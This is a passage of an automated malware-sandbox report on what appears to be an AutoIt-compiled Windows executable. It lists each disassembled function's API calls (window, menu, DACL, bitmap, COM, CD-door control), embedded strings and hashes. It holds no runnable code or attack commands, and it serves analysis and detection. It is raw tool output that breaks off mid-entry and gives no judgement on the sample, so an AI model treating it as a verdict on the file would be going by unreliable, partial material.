                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0070A663
                    • GetDesktopWindow.USER32 ref: 0070A67C
                    • GetWindowRect.USER32(00000000), ref: 0070A683
                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0070A69B
                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0070A6B3
                      • Part of subcall function 006825DB: GetWindowLongW.USER32(?,000000EB), ref: 006825EC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                    • String ID: 0$tooltips_class32
                    • API String ID: 1297703922-3619404913
                    • Opcode ID: 0faa51b4d9ec829b662315a2d4ad270759f51cfee4124f5e117f86fdb7534df8
                    • Instruction ID: a0ce6d9eb783a400c3677861fc9d064f14797b8cc1af0e6ba52a220ade1ba40f
                    • Opcode Fuzzy Hash: 0faa51b4d9ec829b662315a2d4ad270759f51cfee4124f5e117f86fdb7534df8
                    • Instruction Fuzzy Hash: 89715871150305EFD720DF68CC49F667BFAEB89304F08462DF985872A1DB7AA942CB16
                    Function 00704619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 007046AB
                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007046F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                    • API String ID: 3974292440-4258414348
                    • Opcode ID: dd6fc78a74cc60c7dc83d914d6bb326fd84cdc1ea1b97bdb026de34000f7c95f
                    • Instruction ID: 21683e62738268961875fe5f2522a891ed8dac647769ea14bc596c7a6acbaece
                    • Opcode Fuzzy Hash: dd6fc78a74cc60c7dc83d914d6bb326fd84cdc1ea1b97bdb026de34000f7c95f
                    • Instruction Fuzzy Hash: F1918EB4204301DFCB54FF10C491A6AB7E2AF85314F048A6DF9965B3A2DB39ED06CB55
                    Function 0070BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0070BB6E
                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00706D80,?), ref: 0070BBCA
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0070BC03
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0070BC46
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0070BC7D
                    • FreeLibrary.KERNEL32(?), ref: 0070BC89
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0070BC99
                    • DestroyIcon.USER32(?), ref: 0070BCA8
                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0070BCC5
                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0070BCD1
                      • Part of subcall function 006A313D: __wcsicmp_l.LIBCMT ref: 006A31C6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                    • String ID: .dll$.exe$.icl
                    • API String ID: 1212759294-1154884017
                    • Opcode ID: 22a4bdda9a50c1c8fac58e9a517e6ecbf790659797f750bbf375526453a25562
                    • Instruction ID: 60c0d8bf7a94685cf66b43e719a5a9bcbf9aed90d6f0ed959f537d178aabe86f
                    • Opcode Fuzzy Hash: 22a4bdda9a50c1c8fac58e9a517e6ecbf790659797f750bbf375526453a25562
                    • Instruction Fuzzy Hash: 1C61A0B1540219FAEB24EF64CC85BBE77A8FB08710F108619F915D61D1DB78AE90DBA0
                    Function 006EA0B5 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 156COMMON
                    Download Yara Rule
                    APIs
                    • LoadStringW.USER32(00000066,?,00000FFF,0070FB78), ref: 006EA0FC
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                    • LoadStringW.USER32(?,?,00000FFF,?), ref: 006EA11E
                    • __swprintf.LIBCMT ref: 006EA177
                    • __swprintf.LIBCMT ref: 006EA190
                    • _wprintf.LIBCMT ref: 006EA246
                    • _wprintf.LIBCMT ref: 006EA264
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: LoadString__swprintf_wprintf$_memmove
                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%q
                    • API String ID: 311963372-1119993623
                    • Opcode ID: 0c262e4af9a180e9a69c2dae1b7be857b0020a0232082c67257bd09cbe6a6d18
                    • Instruction ID: 7a7aeb5181750bf12729cc0153ca3f7f650af5b68df51329962aa9ce6af98e7c
                    • Opcode Fuzzy Hash: 0c262e4af9a180e9a69c2dae1b7be857b0020a0232082c67257bd09cbe6a6d18
                    • Instruction Fuzzy Hash: F2518E71800209BACF55FBE0CD86EEEB77AAF05300F244269F505721A2EB35AF58DB55
                    Function 006EA5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00689997: __itow.LIBCMT ref: 006899C2
                      • Part of subcall function 00689997: __swprintf.LIBCMT ref: 00689A0C
                    • CharLowerBuffW.USER32(?,?), ref: 006EA636
                    • GetDriveTypeW.KERNEL32 ref: 006EA683
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006EA6CB
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006EA702
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006EA730
                      • Part of subcall function 00687D2C: _memmove.LIBCMT ref: 00687D66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                    • API String ID: 2698844021-4113822522
                    • Opcode ID: 5a064ffd7f2e0a42195dc64577cbb6221527d01a575cacddce229f9568658674
                    • Instruction ID: 8b75fb1c81c1131c3ab68d9305d269961dfc9bcb4e749e0636a725f33007f160
                    • Opcode Fuzzy Hash: 5a064ffd7f2e0a42195dc64577cbb6221527d01a575cacddce229f9568658674
                    • Instruction Fuzzy Hash: 61516DB51043049FD740EF21C88286AB7F6FF98718F144A6CF89657262DB31EE0ACB56
                    Function 006EA45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                    Download Yara Rule
                    APIs
                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 006EA47A
                    • __swprintf.LIBCMT ref: 006EA49C
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 006EA4D9
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 006EA4FE
                    • _memset.LIBCMT ref: 006EA51D
                    • _wcsncpy.LIBCMT ref: 006EA559
                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 006EA58E
                    • CloseHandle.KERNEL32(00000000), ref: 006EA599
                    • RemoveDirectoryW.KERNEL32(?), ref: 006EA5A2
                    • CloseHandle.KERNEL32(00000000), ref: 006EA5AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                    • String ID: :$\$\??\%s
                    • API String ID: 2733774712-3457252023
                    • Opcode ID: 4e362c7897d2d7468cd988019ad625433994c35d15b3a611bc723956cbdaa286
                    • Instruction ID: 9213017c93c1206c24973e37dc205428656e331000a10dc33294583efa926dcc
                    • Opcode Fuzzy Hash: 4e362c7897d2d7468cd988019ad625433994c35d15b3a611bc723956cbdaa286
                    • Instruction Fuzzy Hash: 2F31D2B1500249ABDB20DFA1DC49FEB77BDEF89700F1041BAF908D2160EB7497448B29
                    Function 006BAB1B Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                    • String ID:
                    • API String ID: 884005220-0
                    • Opcode ID: fe1f5f2cb3bc54bfb50d94ce7be4e20f545469b2660bd9f384cb4d2d466051d3
                    • Instruction ID: 025a22a0ea4099b32e5b79c21377259a13de87da114c990d98bc4609bd9d6091
                    • Opcode Fuzzy Hash: fe1f5f2cb3bc54bfb50d94ce7be4e20f545469b2660bd9f384cb4d2d466051d3
                    • Instruction Fuzzy Hash: E861F7F2500215AFDB20AFA4D842BE97BA7EF12321F14421EE8119B291DB39DDC1CB56
                    Function 0070C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00682612: GetWindowLongW.USER32(?,000000EB), ref: 00682623
                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0070C4EC
                    • GetFocus.USER32 ref: 0070C4FC
                    • GetDlgCtrlID.USER32(00000000), ref: 0070C507
                    • _memset.LIBCMT ref: 0070C632
                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0070C65D
                    • GetMenuItemCount.USER32(?), ref: 0070C67D
                    • GetMenuItemID.USER32(?,00000000), ref: 0070C690
                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0070C6C4
                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0070C70C
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0070C744
                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0070C779
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                    • String ID: 0
                    • API String ID: 1296962147-4108050209
                    • Opcode ID: 12490f641d1d64b019d49e1f54b01933fb95fcfd77b440dcb17442ac77a29d46
                    • Instruction ID: a371aa74ae79485c4fa62c8c82e4fe493168af3a295824246d8a78eb4157bef4
                    • Opcode Fuzzy Hash: 12490f641d1d64b019d49e1f54b01933fb95fcfd77b440dcb17442ac77a29d46
                    • Instruction Fuzzy Hash: FB818A70208301DFD722DF14C984A6BBBE9EB89314F10472EF99597291DB79E905CFA2
                    Function 006D83F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006D874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006D8766
                      • Part of subcall function 006D874A: GetLastError.KERNEL32(?,006D822A,?,?,?), ref: 006D8770
                      • Part of subcall function 006D874A: GetProcessHeap.KERNEL32(00000008,?,?,006D822A,?,?,?), ref: 006D877F
                      • Part of subcall function 006D874A: HeapAlloc.KERNEL32(00000000,?,006D822A,?,?,?), ref: 006D8786
                      • Part of subcall function 006D874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006D879D
                      • Part of subcall function 006D87E7: GetProcessHeap.KERNEL32(00000008,006D8240,00000000,00000000,?,006D8240,?), ref: 006D87F3
                      • Part of subcall function 006D87E7: HeapAlloc.KERNEL32(00000000,?,006D8240,?), ref: 006D87FA
                      • Part of subcall function 006D87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,006D8240,?), ref: 006D880B
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 006D8458
                    • _memset.LIBCMT ref: 006D846D
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 006D848C
                    • GetLengthSid.ADVAPI32(?), ref: 006D849D
                    • GetAce.ADVAPI32(?,00000000,?), ref: 006D84DA
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006D84F6
                    • GetLengthSid.ADVAPI32(?), ref: 006D8513
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 006D8522
                    • HeapAlloc.KERNEL32(00000000), ref: 006D8529
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 006D854A
                    • CopySid.ADVAPI32(00000000), ref: 006D8551
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 006D8582
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006D85A8
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 006D85BC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 3996160137-0
                    • Opcode ID: 76dcadab8d949e0ce6f9c21e4c6491b1802566d91dcf4caba4d3731d74830896
                    • Instruction ID: 6dc164771e2a4247c7406347e45b7a85cce86e76314ad226f0512c4d6630ac03
                    • Opcode Fuzzy Hash: 76dcadab8d949e0ce6f9c21e4c6491b1802566d91dcf4caba4d3731d74830896
                    • Instruction Fuzzy Hash: 51612971D00209EFDB10DF95EC49AEEBBBABB04310B04826AE815A7391DB359A05CB64
                    Function 006F762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetDC.USER32(00000000), ref: 006F76A2
                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 006F76AE
                    • CreateCompatibleDC.GDI32(?), ref: 006F76BA
                    • SelectObject.GDI32(00000000,?), ref: 006F76C7
                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 006F771B
                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 006F7757
                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 006F777B
                    • SelectObject.GDI32(00000006,?), ref: 006F7783
                    • DeleteObject.GDI32(?), ref: 006F778C
                    • DeleteDC.GDI32(00000006), ref: 006F7793
                    • ReleaseDC.USER32(00000000,?), ref: 006F779E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                    • String ID: (
                    • API String ID: 2598888154-3887548279
                    • Opcode ID: 2659e0b31fd31726555dfc588fb4cd2092c90e9cefc15de7431ab1c63172c533
                    • Instruction ID: 1a26c1f86e22131ad320474203320dc3cf09322ad5f178f918353fb6031d37d7
                    • Opcode Fuzzy Hash: 2659e0b31fd31726555dfc588fb4cd2092c90e9cefc15de7431ab1c63172c533
                    • Instruction Fuzzy Hash: CE515B75904209EFDB25CFA8CC84EAEBBBAEF48310F14852DFA4997310D735A940CB64
                    Function 00686BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006A0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00686C6C,?,00008000), ref: 006A0BB7
                      • Part of subcall function 006848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006848A1,?,?,006837C0,?), ref: 006848CE
                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00686D0D
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00686E5A
                      • Part of subcall function 006859CD: _wcscpy.LIBCMT ref: 00685A05
                      • Part of subcall function 006A387D: _iswctype.LIBCMT ref: 006A3885
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                    • API String ID: 537147316-1018226102
                    • Opcode ID: 732c2f9198bc10ba39262c5339aacfba32607520d34de27807cabdfe26c939b5
                    • Instruction ID: a4bc700adc51348820c88c8d5c2d88fce6687a3ceb06df2ed9f566ab34cb4c12
                    • Opcode Fuzzy Hash: 732c2f9198bc10ba39262c5339aacfba32607520d34de27807cabdfe26c939b5
                    • Instruction Fuzzy Hash: 4802AD701083419FC764EF24C881AEFBBE6BF99354F144A1DF486972A2DB31D989CB46
                    Function 006845DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 006845F9
                    • GetMenuItemCount.USER32(00746890), ref: 006BD7CD
                    • GetMenuItemCount.USER32(00746890), ref: 006BD87D
                    • GetCursorPos.USER32(?), ref: 006BD8C1
                    • SetForegroundWindow.USER32(00000000), ref: 006BD8CA
                    • TrackPopupMenuEx.USER32(00746890,00000000,?,00000000,00000000,00000000), ref: 006BD8DD
                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 006BD8E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                    • String ID:
                    • API String ID: 2751501086-0
                    • Opcode ID: 6bd40d83eb1f8e4af383aceae6bfad9c34844f6d541589652c3df89a0c861656
                    • Instruction ID: 4932b8771b46b45ae77f02cf34873bc4a7e47bfbb3e670e7a4641d6540d0bd4d
                    • Opcode Fuzzy Hash: 6bd40d83eb1f8e4af383aceae6bfad9c34844f6d541589652c3df89a0c861656
                    • Instruction Fuzzy Hash: BF7104B0601216BAEB309F14DC45FEABF66FF05364F204326F514AA2E0DFB558A0DB94
                    Function 006F8BC0 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 006F8BEC
                    • CoInitialize.OLE32(00000000), ref: 006F8C19
                    • CoUninitialize.OLE32 ref: 006F8C23
                    • GetRunningObjectTable.OLE32(00000000,?), ref: 006F8D23
                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 006F8E50
                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00712C0C), ref: 006F8E84
                    • CoGetObject.OLE32(?,00000000,00712C0C,?), ref: 006F8EA7
                    • SetErrorMode.KERNEL32(00000000), ref: 006F8EBA
                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 006F8F3A
                    • VariantClear.OLEAUT32(?), ref: 006F8F4A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                    • String ID: ,,q
                    • API String ID: 2395222682-3492105362
                    • Opcode ID: b42ec48aaa25e7934171711c766c7b9cfcb37ab10252e64e8be62a1902deaa47
                    • Instruction ID: d4330b1dfc3f6dc8166d2902a4cc2cdfb0e66e34f5810d26431347b5baf12aee
                    • Opcode Fuzzy Hash: b42ec48aaa25e7934171711c766c7b9cfcb37ab10252e64e8be62a1902deaa47
                    • Instruction Fuzzy Hash: 1BC12571604309AFD700EF64C88496BB7EAFF88748F04496DF6899B251DB71ED06CB62
                    Function 007010A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00700038,?,?), ref: 007010BC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
